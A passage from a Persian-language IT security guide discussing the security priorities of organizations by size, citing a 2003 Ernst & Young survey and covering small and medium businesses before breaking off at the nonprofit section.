‫ﻛﺎﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨـﺪ‪ .‬ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳـﺎﺩﻩ ﺑﺎﺷـﺪ ﻭ ﻫـﺮﻛﺲ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ‬
‫ﺑﺮﺍﻱ ﮔﺮﻭﻫﻬﺎﻱ ﺑﺰﺭﮔﺘﺮ ﻣﺜﻞ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺑـﺎ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ‬
‫ﺗﺠﺎﺭﻱ‪ ١‬ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﺔ‬
‫ﺷﻬﺮﻭﻧﺪﺍﻥ ﻳﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻧﻴـﺎﺯ ﺑـﻪ ﺍﻳﺠـﺎﺩ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺭﺳﻤﻲ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮ ﺍﻫﻤﻴﺖ ﭘﻴﺪﺍ ﻣﻲﻛﻨـﺪ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜــﻪ ﻣــﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﻣﻮﺿــﻮﻉ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ‪ -‬ﭼﻪ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ‪،‬‬
‫ﭼﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ‪ ،‬ﻭ ﭼـﻪ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﺩﻭﻟﺘـﻲ ‪-‬‬
‫ﻫﻤﻮﺍﺭﻩ ﺑﺎ ﻣﺴﺎﺋﻞ ﻣﺸﺎﺑﻬﻲ ﻣﻮﺍﺟﻪ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ .‬ﻫﺮ ﮔـﺮﻭﻩ ﺑـﺮﺍﻱ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﻧﻴﺎﺯ ﺑﻪ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺷـﻔﺎﻑ‬
‫ﻭ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺑﻪﺍﺟﺮﺍ ﺩﺭﺁﻣﺪﻥ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﺗﻮﺍﻧـﺎﻳﻲ ﺍﻳﺠـﺎﺩ ﻭ‬
‫ﺣﻔــﻆ ﺁﮔــﺎﻫﻲ ﺍﺯ ﻧﻴﺎﺯﻫــﺎﻱ ﻣــﺸﺘﺮﻳﺎﻥ‪ ،‬ﻭ ﺩﺭﻛــﻲ ﺍﺯ ﭼﮕــﻮﻧﮕﻲ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ ﻋﻤﻠﻴـﺎﺗﻲ ﺩﺍﺭﺩ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻧﻴﺎﺯﻫﺎﻱ ﻛﻠﻲ‪ ،‬ﻫﺮ ﺩﺳﺘﻪ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻣﻼﺣﻈـﺎﺕ‬
‫ﺧﺎﺹ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻫﺪﺍﻑ ﻭ ﻣﺄﻣﻮﺭﻳﺖ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﺩﺍﺭﻧﺪ‪ .‬ﻣـﺪﻳﺮﺍﻥ‬
‫ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻫﺪﺍﻑ ﺗﻌﻴـﻴﻦﺷـﺪﻩ ﺑﺎﻳـﺪ ﺑـﺮ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﺗﻮﺟﻪ ﻣﺆﻛﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺭﻙ ﻫﺰﻳﻨﻪﻫـﺎﻱ‬
‫ﻲ ﻛﺎﺭﺁ ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺍﺳﺖ‪ .‬ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻧـﻮﻋﻲ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺑـﻪ‬
‫ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ ﻭ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺿﺎﻳﻌﺎﺕ ﻣﺤﺘﻤـﻞ‬
‫ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺗﻮﺻﻴﻪﻫﺎﻱ ﻋﻤﻠـﻲ ﺑﺨـﺶ ﺳـﻮﻡ ﺑـﺎ‬
‫ﺩﺭﻛﻲ ﺍﺯ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ‪ -‬ﻛﻪ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ ﺑـﺎ ﻣﻨـﺎﺑﻊ‬
‫ﻣﺤﺪﻭﺩ ﺑﺴﻴﺎﺭ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ‪ -‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪Commercial Transactions‬‬
‫‪1‬‬
‫ﺗﺤﻘﻴﻖ ﺟﻬﺎﻧﻲ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺍﺭﻧـﺴﺖ ﻭ ﻳﺎﻧـﮓ‪ ٢‬ﺩﺭ ﺳـﺎﻝ‬
‫‪ ۲۰۰۳‬ﻧــﺸﺎﻥ ﻣــﻲﺩﻫــﺪ ﻛــﻪ ‪ %۹۰‬ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻣﻌﺘﻘﺪﻧــﺪ ﺍﻣﻨﻴــﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺁﻧﻬﺎ ﺑﻪ ﺍﻫﺪﺍﻑ ﻛﻠﻲﺷـﺎﻥ ﺑـﺴﻴﺎﺭ ﺣـﺎﺋﺰ‬
‫ﺍﻫﻤﻴــﺖ ﺍﺳــﺖ‪ %۷۸ .‬ﺍﺯ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻋﻨــﻮﺍﻥ ﻛﺮﺩﻧــﺪ ﻛــﻪ ﺍﻭﻟــﻴﻦ‬
‫ﻫﺪﻓـﺸﺎﻥ ﺍﺯ ﺗــﻼﺵ ﺑـﺮﺍﻱ ﺗــﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋــﺎﺕ ﻛــﺎﻫﺶ‬
‫ﻣﺨﺎﻃﺮﺍﺕ‪ ٣‬ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺷـﺎﻣﻞ ‪ ۱۰۰۰‬ﺷـﺮﻛﺖ‬
‫ﺛﺮﻭﺗﻤﻨﺪ ﻣﻲﺷﺪﻧﺪ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﻣﺒـﺎﺭﺯﻩ ﺑـﺎ‬
‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣﺔ ﺍﻳﻦ ﺗﺤﻘﻴﻖ‪:‬‬
‫•‬
‫ﺑﻴﺶ ﺍﺯ ‪ %۳۴‬ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﻗـﺪﺭﺕ‬
‫ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻳـﺸﺎﻥ ﺩﺭﺣـﺎﻝ‬
‫ﺣﺎﺿﺮ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ ﺭﺍ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫•‬
‫ﺑــﻴﺶ ﺍﺯ ‪ %۳۳‬ﺍﻇﻬــﺎﺭ ﻣــﻲﻛﻨﻨــﺪ ﻛــﻪ ﺗﻮﺍﻧــﺎﻳﻲ ﺍﺭﺍﺋــﻪ‬
‫ﻋﻜﺲﺍﻟﻌﻤﻞ ﻣﻨﺎﺳﺐ ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ‬
‫ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫•‬
‫ﺗﻨﻬﺎ ‪ %۳۴‬ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺣﺎﺿـﺮ ﺑـﻪ‬
‫ﻲ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﻃﺎﻋﺖ ﺍﺯ ﺿﻮﺍﺑﻂ ﺍﻣﻨﻴﺘ ﹺ‬
‫•‬
‫‪ %۵۶‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻮﺩﺟﺔ ﻧﺎﻛﺎﻓﻲ ﺭﺍ ﻣﺎﻧﻊ ﺍﺻﻠﻲ ﺗﺄﻣﻴﻦ ﻣـﺆﺛﺮ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺩﺍﻧﻨﺪ‪.‬‬
‫•‬
‫ﺣﺪﻭﺩ ‪ %۶۰‬ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺎﺯﮔـﺸﺖ‬
‫ﺳــﺮﻣﺎﻳﻪ ﺭﺍ ﺑــﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋــﺎﺗﻲ ﺑﻨــﺪﺭﺕ ﻣﺤﺎﺳــﺒﻪ‬
‫ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﻫﺮﮔﺰ ﻣﺤﺎﺳﺒﻪ ﻧﻤﻲﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﺗﻨﻬــﺎ ‪ %۲۹‬ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺁﻣــﻮﺯﺵ ﻭ ﺁﮔــﺎﻫﻲ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﺭﺍ‬
‫ﺑﻌﻨﻮﺍﻥ ﻗﺴﻤﺘﻲ ﻛﻪ ﺑﻴﺸﺘﺮﻳﻦ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ‬
‫ﻞ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺭﻭﻱ ﺁﻥ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺫﻛﺮ ﻣﻲﻛﻨﻨﺪ؛ ﺩﺭ ﻣﻘﺎﺑـ ﹺ‬
‫‪ %۸۳‬ﻛﻪ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻌﻨﻮﺍﻥ ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ‬
‫ﺧﻮﺩ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻧﺎﻡ ﻣﻲﺑﺮﻧﺪ‪.‬‬
‫•‬
‫ﺗﻨﻬﺎ ‪ %۳۵‬ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻴﻮﺳﺘﺔ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ ﺁﻣﻮﺯﺷﻲ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﺁﻣﺎﺭﻫﺎ ﺣﺎﻛﻲ ﺍﺯ ﺍﻳـﻦ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻫﻤـﺔ ﺳـﺎﺯﻣﺎﻧﻬﺎ ‪ -‬ﭼـﻪ‬
‫ﻛﻮﭼﻚ ﻭ ﭼﻪ ﺑﺰﺭﮒ ‪ -‬ﻓـﺸﺎﺭﻫﺎﻱ ﻣـﺎﻟﻲ ﻭ ﺭﻭﺍﻧـﻲ ﺗﻬﺪﻳـﺪﻫﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺣﺲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻓﺼﻠﻬﺎﻱ ﺁﺗـﻲ ﺍﻳـﻦ‬
‫‪Ernest & Young‬‬
‫‪Risks‬‬
‫‪2‬‬
‫‪3‬‬
‫‪١٢٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺨﺶ ﺑﻪ ﺍﻭﻟﻮﻳﺘﻬﺎ ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ‬
‫ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪ .‬ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻦ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻖ ﺍﺭﻧـﺴﺖ ﻭ‬
‫ﻳﺎﻧﮓ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﻧﻤـﺎﺩ ﺍﺯ ﭼﺎﻟـﺸﻬﺎﻳﻲ ﻛـﻪ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺍﺩﺍﺭﺍﺕ‬
‫ﺗﺠﺎﺭﻱ ﺑﺎ ﺁﻧﻬﺎ ﻣﻮﺍﺟﻪ ﺷﺪﻩﺍﻧﺪ ﺑﻨﻈﺮ ﻣﻔﻴﺪ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺗﺠﺎﺭﺗﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ‬
‫‪٤‬‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺑﻪ ﺗﺠﺎﺭﺗﻬـﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ ﻣـﺸﻐﻮﻝ ﻫـﺴﺘﻴﺪ‬
‫ﺍﻭﻟﻮﻳﺘﻬــﺎﻱ ﺍﺻــﻠﻲ ﺷــﻤﺎ ﻗﺎﺑﻠﻴــﺖ ﺳــﻮﺩﺁﻭﺭﻱ‪ ،‬ﺗــﺪﺍﻭﻡ ﺗﺠــﺎﺭﺕ‪،‬‬
‫ﭘﺎﻳﺪﺍﺭﻱ‪ ،‬ﻭ ﻛﻴﻔﻴﺖ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺑﻪ ﻣﺸﺘﺮﻱ ﻫﺴﺘﻨﺪ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺑﻮﺳﻴﻠﺔ ﻗـﻮﺍﻧﻴﻦ ﻣﺤﻠـﻲ‪ ،‬ﻧﺎﺣﻴـﻪﺍﻱ‪ ،‬ﻳـﺎ ﻣﻠـﻲ‬
‫ﻣﺤﺪﻭﺩ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺴﺘﻪ ﺑﻪ ﻧﻮﻉ ﺗﺠﺎﺭﺗﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻣﻲﭘﺮﺩﺍﺯﻧـﺪ ﻭ‬
‫ﻣﺤﻴﻂ ﺗﺠﺎﺭﻱ ﻛﺸﻮﺭﻱ ﻛﻪ ﺩﺭ ﺁﻥ ﻓﻌﺎﻟﻴـﺖ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻨﺪ ﻣﺮﻛﺰ ﭘﺎﺳـﺨﮕﻮ ﺑﺎﺷـﻨﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ‬
‫ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺭﻭﻧــﺪ ﺑﺮﻗــﺮﺍﺭﻱ ﺍﻣﻨﻴــﺖ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﻭ‬
‫ﻣﺸﺘﺮﻳﺎﻧﺶ ﺩﺭ ﻣﻘﺎﺑﻞ ﻓﺮﻳﺐ ﻭ ﺣﻤﻼﺕ ﺍﺳﺎﺳﻲ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﻋﻠﻴـﻪ‬
‫ﺧﺪﻣﺎﺕ ﻭ ﺳﻴـﺴﺘﻤﻬﺎ ﻣﺘﻤﺮﻛـﺰ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺟـﺮﻡ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺍﻣﻨﻴــﺖ ﺷــﺒﻜﻪ‪ ،‬ﺣﻔﺎﻇــﺖ ﺍﺯ ﺩﺍﺩﻩﻫــﺎ ﻧﻴــﺰ ﺑــﺮﺍﻱ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻭ ﺑﻪ ﺩﻭ ﺣﻮﺯﺓ‬
‫ﺍﺻﻠﻲ ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﺩ‪ :‬ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﺟﺎﺳﻮﺳﻬﺎ ﻳـﺎ ﻣﻬـﺎﺟﻤﻴﻦ ﺳـﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ‪ ،‬ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫‪٥‬‬
‫ﻣﺸﺘﺮﻱ ﻣﺜﻞ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺎﻟﻲ‪.‬‬
‫‪۴‬‬
‫‪۵‬‬
‫ﺗﻌﺮﻳﻒ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ ﺍﺯ ﻛـﺸﻮﺭﻱ ﺑـﻪ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ‬
‫ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ‪ ،‬ﻳﻚ ﻣﺎﻟﻚ ﺑﺘﻨﻬﺎﻳﻲ ﻫﻤـﺔ ﺟﻨﺒـﻪﻫـﺎﻱ‬
‫ﻳﻚ ﺗﺠﺎﺭﺕ ﺳﻨﺘﻲ ﻣﺜﻞ ﻣﺰﺭﻋﻪﺩﺍﺭﻱ ﻳﺎ ﺧﻮﺍﺭﺑﺎﺭ ﻓﺮﻭﺷﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣـﻲ‪-‬‬
‫ﺩﻫﺪ؛ ﻳﻌﻨﻲ ﻣﺎﻟﻚ ﺗﻨﻬﺎ ﻛﺎﺭﻣﻨﺪ ﺁﻥ ﺗﺠـﺎﺭﺕ ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺩﺭ ﺗﺠﺎﺭﺗﻬـﺎﻱ‬
‫ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻨﺪ ﺻﺪ ﻧﻔﺮ ﺗﻨﻬﺎ ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ‬
‫ﻳﺎ ﻣﺤﺼﻮﻻﺕ ﻓﻨﻲ ﺑﭙﺮﺩﺍﺯﻧﺪ‪ .‬ﺩﺭ ﺩﻧﻴﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ‪ ،‬ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑـﺎ‬
‫ﺗﻜﻴﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻣﻲﻛﻨﻨﺪ ﺩﺭ ﮔﺮﻭﻩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ‬
‫ﻭ ﻣﺘﻮﺳﻂ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﮔﺮﻭﻫﻬﺎﻱ ﺳـﺮﻣﺎﻳﻪ‪-‬‬
‫ﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺁﻧﻬﺎ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷـﻮﺩ‪ ،‬ﺑـﺴﺮﻋﺖ ﺑـﺰﺭﮒ ﺷـﻮﻧﺪ‪ ،‬ﻭ ﻳـﺎ‬
‫ﺗﻮﺳﻂ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﺧﺮﻳﺪﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ‬
‫ﻭ ﻣﺘﻮﺳﻂ ﺑﺴﻴﺎﺭ ﻣﻮﻓﻖ‪ ،‬ﺍﻭﺭﺍﻕ ﺳﻬﺎﻡ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨـﺪ ﻭ ﺧﻮﺩﺷـﺎﻥ ﺑـﻪ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﻭ ﻋﻤﻮﻣﻲ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺩﺭ ﺣﺎﻟــﺖ ﻛﻠــﻲ ﺟﺎﺳﻮﺳــﻲ ﺳــﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺩﺭ ﺷــﺮﻛﺘﻬﺎﻱ ﺑــﺰﺭﮒ ﻳــﺎ‬
‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﺤﺼﻮﻻﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ﺗﻮﻟﻴﺪ ﻣـﻲﻛﻨﻨـﺪ ‪-‬‬
‫ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻮﺁﻭﺭﻱ ﺍﺭﺯﺵ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﻭ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺯﺩﻳـﺪﻩ‬
‫ﺷﻮﺩ ‪ -‬ﻳﻚ ﻧﮕﺮﺍﻧﻲ ﻣﺤﺴﻮﺏ ﻣـﻲﺷـﻮﺩ‪ .‬ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺑـﻪ‬
‫ﺗﺠﺎﺭﺕ ﻣﺸﻐﻮﻟﻨﺪ‪ ،‬ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻧﮕﺮﺍﻧﻲ ﺟﺪﻱﺗﺮﻱ ﺍﺯ ﺟﺎﺳﻮﺳـﻲ ﺍﺳـﺖ‪،‬‬
‫ﻫﺮﭼﻨﺪ ﺁﺛﺎﺭ ﻫﺮ ﺩﻭ ﻣﺸﺎﺑﻪ ﺍﺳﺖ‪ .‬ﺑﻄﻮﺭ ﺧﺎﺹ ﻫﺮ ﺷﺮﻛﺖ ﺑﺎﻳـﺪ ﺳـﻮﺍﺑﻖ‬
‫ﺣــﺴﺎﺑﺪﺍﺭﻱ‪ ،‬ﺍﻃﻼﻋــﺎﺕ ﻛﺎﺭﻛﻨــﺎﻥ‪ ،‬ﻭ ﺍﻃﻼﻋــﺎﺕ ﺗﺮﺍﻛﻨــﺸﻬﺎﻱ ﻛــﺎﺭﺕ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺘﻴﺎﺑﻲ ﻏﻴﺮﻣﺠﺎﺯ ﻣﺤﺎﻓﻈﺖ ﻛﻨﺪ‪.‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ‬
‫ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﻪ ﺗﺄﺛﻴﺮﮔـﺬﺍﺭﻱ‬
‫ﺭﻭﻱ ﺑﺎﺯﺍﺭ‪ ،‬ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﺟﻮﺍﻣﻊ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﻫﻤﻜـﺎﺭ‪ ،‬ﻭ ﺑﺪﺳـﺖ‬
‫ﺁﻭﺭﺩﻥ ﺷﻬﺮﺕ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻫﺰﻳﻨـﺔ‬
‫ﻻ ﺑﺪﻟﻴﻞ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ‬
